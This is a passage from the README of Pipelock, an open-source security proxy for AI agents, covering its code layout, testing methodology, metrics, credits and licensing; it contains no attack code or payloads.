Structure\n\n```text\ncmd/pipelock/          CLI entry point\ninternal/\n  cli/                 20+ Cobra commands (run, check, generate, mcp, integrity, ...)\n  config/              YAML config, validation, defaults, hot-reload (fsnotify)\n  scanner/             11-layer URL scanning pipeline + response injection detection\n  audit/               Structured JSON logging (zerolog) + event emission dispatch\n  proxy/               HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS interception\n  certgen/             ECDSA P-256 CA + leaf certificate generation, cache\n  mcp/                 MCP proxy + bidirectional scanning + tool poisoning + chains\n  killswitch/          Emergency deny-all (4 sources) + port-isolated API\n  emit/                Event emission (webhook + syslog sinks)\n  metrics/             Prometheus metrics + JSON stats\n  normalize/           Unicode normalization (NFKC, confusables, combining marks)\n  integrity/           SHA256 file integrity monitoring\n  signing/             Ed25519 key management\n  gitprotect/          Git diff scanning for secrets\n  hitl/                Human-in-the-loop terminal approval\n  report/              HTML/JSON audit report generation from JSONL event logs\n  projectscan/         Project directory scanning for audit command\n  addressprotect/      Blockchain address validation and poisoning detection\n  seedprotect/         BIP-39 seed phrase detection (dictionary, sliding window, checksum)\n  rules/               Community rule bundle loading, verification, and CLI\nenterprise/            Multi-agent features (ELv2, see enterprise/LICENSE)\nconfigs/               7 preset config files\ndocs/                  Guides, references, compliance mappings\n```\n\n## Testing\n\nPipelock is tested like a security product, not just a developer tool. The open-source core is covered by thousands of unit, integration, and end-to-end tests across the proxy, scanner, MCP, WebSocket, and policy layers. In addition, we maintain a separate private adversarial test suite that exercises real-world attack classes against the production binary.\n\nThat suite covers the problems an agent firewall actually has to stop: secret exfiltration, prompt injection, SSRF, tool poisoning, and transport-layer evasions across HTTP, WebSocket, and MCP. We publish the methodology and coverage areas; we do not publish live bypass payloads that would lower attacker cost. Every bypass graduates into a regression test before release.\n\nThis is not security through obscurity. Pipelock's detection and enforcement logic is open source and inspectable. Public tests remain extensive. The private adversarial suite exists to continuously regression-test bypass classes without handing out a replay script.\n\nFor more detail on the security model, trust boundaries, and known limitations, see the [Security Assurance Case](docs/security-assurance.md).\n\n### Metrics\n\nCanonical metrics, updated each release.\n\n| Metric | Value |\n|--------|-------|\n| Go tests (with `-race`) | 10,000+ |\n| Statement coverage | 88%+ |\n| Evasion techniques tested | 230+ |\n| Scanner pipeline overhead | ~32μs per URL scan ([performance details](docs/performance.md)) |\n| CI matrix | Go 1.25 + 1.26, CodeQL, golangci-lint |\n| Supply chain | SLSA provenance, CycloneDX SBOM, cosign signatures |\n| OpenSSF Scorecard | [Live score](https://scorecard.dev/viewer/?uri=github.com/luckyPipewrench/pipelock) |\n\nRun `make test` to verify locally. Performance data: [docs/performance.md](docs/performance.md). Raw benchmarks: [docs/benchmarks.md](docs/benchmarks.md).\n\nIndependent benchmark: [agent-egress-bench](https://github.com/luckyPipewrench/agent-egress-bench) (72 attack cases across 8 categories, tool-neutral).\n\n## Credits\n\n- Architecture influenced by [Anthropic's Claude Code sandboxing](https://www.anthropic.com/engineering/claude-code-sandboxing) and [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime)\n- Threat model informed by [OWASP Agentic AI Top 10](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)\n- See [docs/comparison.md](docs/comparison.md) for how Pipelock relates to other tools in this space\n- Security review contributions from Dylan Corrales\n\nContributions welcome. See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.\n\nIf Pipelock is useful, please [star this repository](https://github.com/luckyPipewrench/pipelock). It helps others find the project.\n\n## License\n\nPipelock core is licensed under the **Apache License 2.0**. Copyright 2026 Joshua Waldrep.\n\nMulti-agent features (per-agent identity, budgets, and configuration isolation)\nare in the `enterprise/` directory, gated by the `enterprise` build tag and licensed\nunder the **Elastic License 2.0 (ELv2)**. These features activate with a valid license key.\n\nThe open-source core works independently without paid features. All scanning, detection,\nand single-agent protection is free.\n\nPre-built release artifacts (Homebrew, GitHub releases, Docker images) include paid-tier\ncode that activates with a valid license key. Building from source with `go install` or the\nrepository `Dockerfile` produces a Community-only binary.\n\nSee [LICENSE](LICENSE) for the Apache 2.0 text and [enterprise/LICENSE](enterprise/LICENSE) for the ELv2 text.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluckypipewrench%2Fpipelock","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fluckypipewrench%2Fpipelock","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fluckypipewrench%2Fpipelock/lists"}